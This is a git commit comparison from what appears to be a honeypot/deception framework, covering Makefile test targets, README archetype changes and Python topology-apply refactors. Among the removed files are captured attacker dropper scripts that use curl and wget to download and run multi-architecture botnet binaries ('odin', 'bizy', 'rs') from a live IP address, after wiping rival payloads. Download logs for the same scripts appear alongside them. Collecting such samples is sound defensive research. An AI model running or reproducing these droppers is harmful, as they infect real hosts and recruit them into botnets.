Compare commits
3 Commits
4586e36d63
...
testing
| Author | SHA1 | Date | |
|---|---|---|---|
|
|
b12d46ff9d | ||
|
|
2ce076cd37 | ||
|
|
e8d97281f7 |
19
.gitignore
vendored
19
.gitignore
vendored
@@ -51,22 +51,3 @@ schem
|
||||
|
||||
# pydeps-style dependency graph dumps from local analysis runs.
|
||||
deps.txt
|
||||
|
||||
# Node modules vendored under decnet/canary/ for the obfuscator helper.
|
||||
# The package.json is the source of truth; modules are reinstalled at
|
||||
# build/deploy time.
|
||||
node_modules/
|
||||
package-lock.json
|
||||
|
||||
# TTP rule-precision corpus pulled from prod sqlite. Real attacker
|
||||
# payloads — operator-only artifact. The synthetic ``seed_*.jsonl``
|
||||
# files alongside ARE committed and exercise the harness in CI.
|
||||
tests/ttp/rule_precision/corpus/*.jsonl
|
||||
tests/ttp/rule_precision/corpus/seed_*.jsonl
|
||||
threatfox-api.json
|
||||
|
||||
# MITRE ATT&CK STIX bundle — 50 MB, fetched at runtime via attack_stix.py
|
||||
enterprise-attack-*.json
|
||||
|
||||
# pytest failure dump files
|
||||
testfail
|
||||
|
||||
219
Makefile
219
Makefile
@@ -1,219 +0,0 @@
|
||||
PYTEST := .311/bin/pytest
|
||||
FAIL_FAST ?= 1
|
||||
ARGS :=
|
||||
|
||||
# addopts in pyproject.toml already provides -v -q -x -n 4 --dist load.
|
||||
# Unit suites inherit that; special suites clear it with --override-ini.
|
||||
UNIT_FLAGS := --timeout=30 --timeout-method=thread
|
||||
SEQ_FLAGS := --override-ini="addopts=-v -x" -n logical --timeout=120 --timeout-method=thread
|
||||
FUZZ_FLAGS := --override-ini="addopts=-v -x" -n logical -m fuzz \
|
||||
--ignore=tests/api/test_schemathesis.py \
|
||||
--ignore=tests/api/test_schemathesis_agent.py \
|
||||
--ignore=tests/api/test_schemathesis_swarm.py \
|
||||
--ignore=tests/api/test_schemathesis_ttp.py
|
||||
SCHEMA_QUICK ?= 0
|
||||
SCHEMA_FLAGS := --override-ini="addopts=-v -x" -n 4 -m fuzz --timeout=600 --timeout-method=thread
|
||||
BENCH_FLAGS := --override-ini="addopts=-v" -p no:xdist --benchmark-only -m bench
|
||||
|
||||
# ── Unit suites (xdist, 30s timeout) ─────────────────────────────────────────
|
||||
|
||||
.PHONY: test-core
|
||||
test-core:
|
||||
$(PYTEST) tests/core tests/config tests/factories tests/fixtures $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-web
|
||||
test-web:
|
||||
$(PYTEST) tests/web tests/services $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-db
|
||||
test-db:
|
||||
$(PYTEST) tests/db tests/vectorstore $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-bus
|
||||
test-bus:
|
||||
$(PYTEST) tests/bus tests/logging tests/telemetry $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-ttp
|
||||
test-ttp:
|
||||
$(PYTEST) tests/ttp $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-intel
|
||||
test-intel:
|
||||
$(PYTEST) tests/intel tests/asn tests/geoip $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-analysis
|
||||
test-analysis:
|
||||
$(PYTEST) tests/clustering tests/correlation $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-infra
|
||||
test-infra:
|
||||
$(PYTEST) tests/agent tests/collector tests/sniffer tests/profiler $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-fleet
|
||||
test-fleet:
|
||||
$(PYTEST) tests/fleet tests/swarm tests/topology tests/orchestrator tests/deploy tests/updater $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-cli
|
||||
test-cli:
|
||||
$(PYTEST) tests/cli tests/engine tests/mutator tests/realism $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-features
|
||||
test-features:
|
||||
$(PYTEST) tests/canary tests/artifacts tests/webhook tests/decky_io tests/prober $(UNIT_FLAGS) $(ARGS)
|
||||
|
||||
# ── Go and React suites ───────────────────────────────────────────────────────
|
||||
|
||||
_GO_MODULES := \
|
||||
decnet/templates/_caddy_modules/decnetfp \
|
||||
decnet/templates/http/_caddy_modules/decnetfp \
|
||||
decnet/templates/https/_caddy_modules/decnetfp
|
||||
|
||||
.PHONY: test-go
|
||||
test-go:
|
||||
@failed=""; \
|
||||
for mod in $(_GO_MODULES); do \
|
||||
echo "=== go test: $$mod ==="; \
|
||||
if (cd "$$mod" && go test ./...); then \
|
||||
echo "[PASS] $$mod"; \
|
||||
else \
|
||||
echo "[FAIL] $$mod"; \
|
||||
failed="$$failed $$mod"; \
|
||||
if [ "$(FAIL_FAST)" = "1" ]; then exit 1; fi; \
|
||||
fi; \
|
||||
done; \
|
||||
[ -z "$$failed" ]
|
||||
|
||||
.PHONY: test-react
|
||||
test-react:
|
||||
cd decnet_web && npm run test:run $(ARGS)
|
||||
|
||||
# ── Special suites (sequential, longer timeout) ───────────────────────────────
|
||||
|
||||
.PHONY: test-live
|
||||
test-live:
|
||||
$(PYTEST) tests/live -m live $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-api
|
||||
test-api:
|
||||
$(PYTEST) tests/api $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-stress
|
||||
test-stress:
|
||||
$(PYTEST) tests/stress -m stress $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-service
|
||||
test-service:
|
||||
$(PYTEST) tests/service_testing $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-fuzz
|
||||
test-fuzz:
|
||||
$(PYTEST) $(FUZZ_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-schema
|
||||
test-schema:
|
||||
SCHEMA_QUICK=$(SCHEMA_QUICK) $(PYTEST) \
|
||||
tests/api/test_schemathesis.py \
|
||||
tests/api/test_schemathesis_agent.py \
|
||||
tests/api/test_schemathesis_swarm.py \
|
||||
tests/api/test_schemathesis_ttp.py \
|
||||
$(SCHEMA_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-bench
|
||||
test-bench:
|
||||
$(PYTEST) tests/perf $(BENCH_FLAGS) $(ARGS)
|
||||
|
||||
.PHONY: test-docker
|
||||
test-docker:
|
||||
DECNET_LIVE_DOCKER=1 $(PYTEST) tests/docker -m docker $(SEQ_FLAGS) $(ARGS)
|
||||
|
||||
# ── Static analysis ───────────────────────────────────────────────────────────
|
||||
|
||||
.PHONY: test-mypy
|
||||
test-mypy:
|
||||
.311/bin/mypy decnet --ignore-missing-imports --no-error-summary
|
||||
|
||||
.PHONY: test-bandit
|
||||
test-bandit:
|
||||
.311/bin/bandit -r decnet -c pyproject.toml
|
||||
|
||||
.PHONY: test-vulture
|
||||
test-vulture:
|
||||
.311/bin/vulture decnet --min-confidence 80
|
||||
|
||||
.PHONY: test-pip-audit
|
||||
test-pip-audit:
|
||||
.311/bin/pip-audit
|
||||
|
||||
# ── Composite: all suites ─────────────────────────────────────────────────────
|
||||
|
||||
_ALL_SUITES := core web db bus ttp intel analysis infra fleet cli features \
|
||||
go react \
|
||||
live api schema stress service fuzz bench docker \
|
||||
mypy bandit vulture pip-audit
|
||||
|
||||
.PHONY: test-all test
|
||||
test-all test:
|
||||
@failed=""; \
|
||||
for suite in $(_ALL_SUITES); do \
|
||||
echo ""; \
|
||||
echo "══════════════════════════ $$suite ══════════════════════════"; \
|
||||
if $(MAKE) --no-print-directory test-$$suite ARGS="$(ARGS)"; then \
|
||||
echo "[PASS] $$suite"; \
|
||||
else \
|
||||
echo "[FAIL] $$suite"; \
|
||||
failed="$$failed $$suite"; \
|
||||
if [ "$(FAIL_FAST)" = "1" ]; then \
|
||||
echo "Stopping at first failure. Use FAIL_FAST=0 to run all suites."; \
|
||||
exit 1; \
|
||||
fi; \
|
||||
fi; \
|
||||
done; \
|
||||
if [ -n "$$failed" ]; then \
|
||||
echo ""; \
|
||||
echo "Failed:$$failed"; \
|
||||
exit 1; \
|
||||
fi; \
|
||||
echo ""; \
|
||||
echo "All suites passed."
|
||||
|
||||
.PHONY: help
|
||||
help:
|
||||
@echo "Unit suites (xdist, 30s timeout):"
|
||||
@echo " make test-core tests/core + config + factories + fixtures"
|
||||
@echo " make test-web tests/web + services"
|
||||
@echo " make test-db tests/db + vectorstore"
|
||||
@echo " make test-bus tests/bus + logging + telemetry"
|
||||
@echo " make test-ttp tests/ttp"
|
||||
@echo " make test-intel tests/intel + asn + geoip"
|
||||
@echo " make test-analysis tests/clustering + correlation"
|
||||
@echo " make test-infra tests/agent + collector + sniffer + profiler"
|
||||
@echo " make test-fleet tests/fleet + swarm + topology + orchestrator + deploy + updater"
|
||||
@echo " make test-cli tests/cli + engine + mutator + realism"
|
||||
@echo " make test-features tests/canary + artifacts + webhook + decky_io + prober"
|
||||
@echo ""
|
||||
@echo "Go / React suites:"
|
||||
@echo " make test-go go test ./... in each Caddy module variant"
|
||||
@echo " make test-react vitest run in decnet_web"
|
||||
@echo ""
|
||||
@echo "Special suites (sequential, 120s timeout):"
|
||||
@echo " make test-live tests/live"
|
||||
@echo " make test-api tests/api (schemathesis)"
|
||||
@echo " make test-stress tests/stress"
|
||||
@echo " make test-service tests/service_testing"
|
||||
@echo " make test-schema schemathesis contract tests (-m fuzz, xdist logical)"
|
||||
@echo " make test-schema SCHEMA_QUICK=1 same, capped at 100 examples per test"
|
||||
@echo " make test-fuzz hypothesis fuzz (all normal dirs, -m fuzz, skips schemathesis files)"
|
||||
@echo " make test-bench tests/perf"
|
||||
@echo " make test-docker tests/docker (needs DECNET_LIVE_DOCKER=1)"
|
||||
@echo ""
|
||||
@echo "Static analysis:"
|
||||
@echo " make test-mypy mypy type check on decnet/"
|
||||
@echo " make test-bandit bandit security scan on decnet/"
|
||||
@echo " make test-vulture vulture dead code scan (>=80% confidence)"
|
||||
@echo " make test-pip-audit pip-audit dependency vulnerability scan"
|
||||
@echo ""
|
||||
@echo "Composites:"
|
||||
@echo " make test-all ALL suites (unit + go + react + live + api + schema + fuzz + bench + stress + docker + static analysis)"
|
||||
@echo " make test-all FAIL_FAST=0 same, report all failures instead of stopping"
|
||||
@echo ""
|
||||
@echo "Passthrough: make test-web ARGS='--lf -s'"
|
||||
@@ -182,7 +182,6 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
|
||||
|
||||
| Slug | Services | OS Fingerprint | Description |
|
||||
|---|---|---|---|
|
||||
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
|
||||
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
|
||||
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
|
||||
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
|
||||
@@ -273,11 +272,6 @@ List live at any time with `decnet services`.
|
||||
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
|
||||
|
||||
```ini
|
||||
[deaddeck-1]
|
||||
amount=1
|
||||
archetype=deaddeck
|
||||
ssh.password=admin
|
||||
|
||||
[decky-webmail.http]
|
||||
server_header = Apache/2.4.54 (Debian)
|
||||
fake_app = wordpress
|
||||
|
||||
@@ -1,3 +0,0 @@
|
||||
[0] Downloading 'http://31.56.209.39/curl.sh' ...
|
||||
Saving 'curl.sh.1'
|
||||
HTTP response 200 OK [http://31.56.209.39/curl.sh]
|
||||
@@ -1,46 +0,0 @@
|
||||
#!/bin/sh
|
||||
ulimit -n 4096
|
||||
ulimit -n 999999
|
||||
ulimit -v 2097152
|
||||
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||
rm -rf odin*
|
||||
rm -rf bizy*
|
||||
rm -rf rs*
|
||||
rm -rf *.sh
|
||||
|
||||
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||
|
||||
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
|
||||
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
|
||||
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
|
||||
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
|
||||
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
|
||||
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
|
||||
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
|
||||
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
|
||||
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
|
||||
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
|
||||
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
|
||||
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
|
||||
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
|
||||
|
||||
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
|
||||
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
|
||||
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||
@@ -1,3 +0,0 @@
|
||||
wget http://31.56.209.39/wget.sh -o wget.sh
|
||||
|
||||
wget http://31.56.209.39/curl.sh -o curl.sh
|
||||
@@ -1,3 +0,0 @@
|
||||
[0] Downloading 'http://31.56.209.39/wget.sh' ...
|
||||
Saving 'wget.sh.1'
|
||||
HTTP response 200 OK [http://31.56.209.39/wget.sh]
|
||||
@@ -1,46 +0,0 @@
|
||||
#!/bin/sh
|
||||
ulimit -n 4096
|
||||
ulimit -n 999999
|
||||
ulimit -v 2097152
|
||||
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
|
||||
rm -rf odin*
|
||||
rm -rf bizy*
|
||||
rm -rf rs*
|
||||
rm -rf *.sh
|
||||
|
||||
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
|
||||
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
|
||||
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
|
||||
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
|
||||
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
|
||||
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
|
||||
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
|
||||
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
|
||||
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
|
||||
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
|
||||
|
||||
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
|
||||
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
|
||||
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
|
||||
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
|
||||
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
|
||||
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
|
||||
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
|
||||
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
|
||||
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
|
||||
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
|
||||
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
|
||||
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
|
||||
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
|
||||
|
||||
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
|
||||
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
|
||||
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
|
||||
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
|
||||
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
|
||||
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
|
||||
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
|
||||
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
|
||||
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
|
||||
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
|
||||
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64
|
||||
@@ -1,5 +0,0 @@
|
||||
# bait/
|
||||
|
||||
Default operator-supplied email seed for IMAP/POP3 deckies. Drop `*.eml` and/or `*.json` files here; the IMAP/POP3 services bind-mount this dir read-only at `/var/spool/decnet-emails/seed` when no per-decky `email_seed` is configured. Entries concatenate onto the hardcoded bait baseline (additive to realism-engine output, never replacing).
|
||||
|
||||
JSON shape: list of dicts with required `from_addr`, `to_addr`, `subject`, `body`; optional `from_name`, `date`, `flags`. See `decnet/templates/imap/server.py` for the loader.
|
||||
BIN
decnet.tar
BIN
decnet.tar
Binary file not shown.
@@ -194,7 +194,7 @@ async def self_destruct() -> None:
|
||||
argv = ["/bin/bash", path]
|
||||
spawn_kwargs = {"start_new_session": True}
|
||||
|
||||
subprocess.Popen( # type: ignore[call-overload] # nosec B603
|
||||
subprocess.Popen( # nosec B603
|
||||
argv,
|
||||
stdin=subprocess.DEVNULL,
|
||||
stdout=subprocess.DEVNULL,
|
||||
|
||||
@@ -121,7 +121,7 @@ def start() -> Optional[asyncio.Task]:
|
||||
return None
|
||||
|
||||
try:
|
||||
from decnet import __version__ as _v # type: ignore[attr-defined]
|
||||
from decnet import __version__ as _v
|
||||
agent_version = _v
|
||||
except Exception:
|
||||
agent_version = "unknown"
|
||||
|
||||
@@ -59,73 +59,6 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
|
||||
return str(tid)
|
||||
|
||||
|
||||
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
|
||||
"""Verify hash integrity and structural validity; return topology_id."""
|
||||
local_hash = canonical_hash(hydrated)
|
||||
if local_hash != version_hash:
|
||||
raise HashMismatch(
|
||||
f"master hash {version_hash!r} does not match agent hash "
|
||||
f"{local_hash!r} — refusing to apply"
|
||||
)
|
||||
issues = _validate_topology(hydrated)
|
||||
if _validation_errors(issues):
|
||||
raise ValidationError(issues)
|
||||
return _topology_id(hydrated)
|
||||
|
||||
|
||||
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
|
||||
"""Tear down the current topology if it differs from topology_id.
|
||||
|
||||
Master is authoritative — a different pinned topology (fully applied,
|
||||
partially applied, or drifted) is torn down before the new apply proceeds.
|
||||
Refusing with 409 would leave the agent stuck in a state only a human
|
||||
could resolve.
|
||||
"""
|
||||
existing = store.current()
|
||||
if existing is None or existing.topology_id == topology_id:
|
||||
return
|
||||
log.info(
|
||||
"superseding topology %s with %s on master authority",
|
||||
existing.topology_id, topology_id,
|
||||
)
|
||||
try:
|
||||
await teardown(existing.topology_id, store)
|
||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
||||
log.warning(
|
||||
"best-effort teardown of superseded topology %s failed: %s",
|
||||
existing.topology_id, exc,
|
||||
)
|
||||
# Hard-clear the store row so the new apply isn't blocked by a
|
||||
# half-torn-down predecessor. Leftover docker objects surface via
|
||||
# the next heartbeat's observed block.
|
||||
store.clear(existing.topology_id)
|
||||
|
||||
|
||||
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
|
||||
"""Create bridge networks, write compose file, and bring up containers.
|
||||
|
||||
Sync/blocking — callers must dispatch via asyncio.to_thread.
|
||||
|
||||
``--always-recreate-deps`` keeps service containers' netns shares
|
||||
fresh: every decky service joins its base's netns via
|
||||
``network_mode: container:<base>``, and that share is bound at
|
||||
service start time. If a base is recreated (e.g. when ``ports:``
|
||||
changes after toggling ``forwards_l3``) but compose decides the
|
||||
services are unchanged, the services keep a stale netns FD
|
||||
pointing at the destroyed base — they end up in an empty
|
||||
namespace with only ``lo``, and external traffic hits a closed
|
||||
port on the live base. Forcing dependents to recreate alongside
|
||||
the base is the cheapest way to make this race impossible.
|
||||
"""
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
client = docker.from_env()
|
||||
for lan in hydrated["lans"]:
|
||||
net_name = _topology_network_name(topology_id, lan["name"])
|
||||
create_bridge_network(client, net_name, lan["subnet"], internal=not lan["is_dmz"])
|
||||
write_topology_compose(hydrated, compose_path)
|
||||
_compose_with_retry("up", "--build", "-d", "--always-recreate-deps", compose_file=compose_path)
|
||||
|
||||
|
||||
async def apply(
|
||||
hydrated: dict[str, Any],
|
||||
version_hash: str,
|
||||
@@ -140,11 +73,76 @@ async def apply(
|
||||
Any docker / compose error propagates up; the endpoint maps it
|
||||
to 500 and records the message on the store row.
|
||||
"""
|
||||
topology_id = _check_hash_and_validate(hydrated, version_hash)
|
||||
await _teardown_superseded(topology_id, store)
|
||||
await asyncio.to_thread(_materialise, hydrated, topology_id)
|
||||
local_hash = canonical_hash(hydrated)
|
||||
if local_hash != version_hash:
|
||||
raise HashMismatch(
|
||||
f"master hash {version_hash!r} does not match agent hash "
|
||||
f"{local_hash!r} — refusing to apply"
|
||||
)
|
||||
|
||||
issues = _validate_topology(hydrated)
|
||||
if _validation_errors(issues):
|
||||
raise ValidationError(issues)
|
||||
|
||||
topology_id = _topology_id(hydrated)
|
||||
# Master is authoritative. If a different topology is pinned here
|
||||
# — whether it fully applied, only partially applied (failure
|
||||
# marker row + orphan containers), or drifted — teardown first,
|
||||
# then accept the new one. Refusing with 409 would leave the
|
||||
# agent stuck in a state only a human could resolve.
|
||||
existing = store.current()
|
||||
if existing is not None and existing.topology_id != topology_id:
|
||||
log.info(
|
||||
"superseding topology %s with %s on master authority",
|
||||
existing.topology_id, topology_id,
|
||||
)
|
||||
try:
|
||||
await teardown(existing.topology_id, store)
|
||||
except Exception as exc: # noqa: BLE001 — we still want to try applying
|
||||
log.warning(
|
||||
"best-effort teardown of superseded topology %s failed: %s",
|
||||
existing.topology_id, exc,
|
||||
)
|
||||
# Hard-clear the store row so the new apply isn't blocked
|
||||
# by a half-torn-down predecessor. Leftover docker objects
|
||||
# will surface via the next heartbeat's observed block.
|
||||
store.clear(existing.topology_id)
|
||||
|
||||
lans = hydrated["lans"]
|
||||
compose_path = _topology_compose_path(topology_id)
|
||||
client = docker.from_env()
|
||||
|
||||
# Bridges + compose are sync/blocking; hop to a thread so we don't
|
||||
# stall the event loop on a slow docker daemon.
|
||||
def _materialise() -> None:
|
||||
for lan in lans:
|
||||
net_name = _topology_network_name(topology_id, lan["name"])
|
||||
internal = not lan["is_dmz"]
|
||||
create_bridge_network(
|
||||
client, net_name, lan["subnet"], internal=internal
|
||||
)
|
||||
write_topology_compose(hydrated, compose_path)
|
||||
# ``--always-recreate-deps`` keeps service containers' netns shares
|
||||
# fresh: every decky service joins its base's netns via
|
||||
# ``network_mode: container:<base>``, and that share is bound at
|
||||
# service start time. If a base is recreated (e.g. when ``ports:``
|
||||
# changes after toggling ``forwards_l3``) but compose decides the
|
||||
# services are unchanged, the services keep a stale netns FD
|
||||
# pointing at the destroyed base — they end up in an empty
|
||||
# namespace with only ``lo``, and external traffic hits a closed
|
||||
# port on the live base. Forcing dependents to recreate alongside
|
||||
# the base is the cheapest way to make this race impossible.
|
||||
_compose_with_retry(
|
||||
"up", "--build", "-d", "--always-recreate-deps",
|
||||
compose_file=compose_path,
|
||||
)
|
||||
|
||||
await asyncio.to_thread(_materialise)
|
||||
|
||||
store.put(topology_id, version_hash, hydrated)
|
||||
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
|
||||
log.info(
|
||||
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
|
||||
)
|
||||
|
||||
|
||||
async def teardown(
|
||||
|
||||
@@ -63,7 +63,6 @@ class TopologyStore:
|
||||
# The agent is single-process, so there's no real contention —
|
||||
# sqlite's own connection lock is enough.
|
||||
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
|
||||
self._conn.row_factory = sqlite3.Row
|
||||
self._conn.execute(
|
||||
"CREATE TABLE IF NOT EXISTS applied_topology ("
|
||||
" topology_id TEXT PRIMARY KEY,"
|
||||
@@ -85,11 +84,11 @@ class TopologyStore:
|
||||
if row is None:
|
||||
return None
|
||||
return AppliedRow(
|
||||
topology_id=row["topology_id"],
|
||||
applied_version_hash=row["applied_version_hash"],
|
||||
hydrated=json.loads(row["hydrated_blob_json"]),
|
||||
applied_at=int(row["applied_at"]),
|
||||
last_error=row["last_error"],
|
||||
topology_id=row[0],
|
||||
applied_version_hash=row[1],
|
||||
hydrated=json.loads(row[2]),
|
||||
applied_at=int(row[3]),
|
||||
last_error=row[4],
|
||||
)
|
||||
|
||||
# ---------------------------------------------------------------- writes
|
||||
|
||||
@@ -1 +0,0 @@
|
||||
"""Artifact storage helpers shared between the web router and TTP workers."""
|
||||
@@ -1,86 +0,0 @@
|
||||
"""
|
||||
Shared on-disk artifact path resolution.
|
||||
|
||||
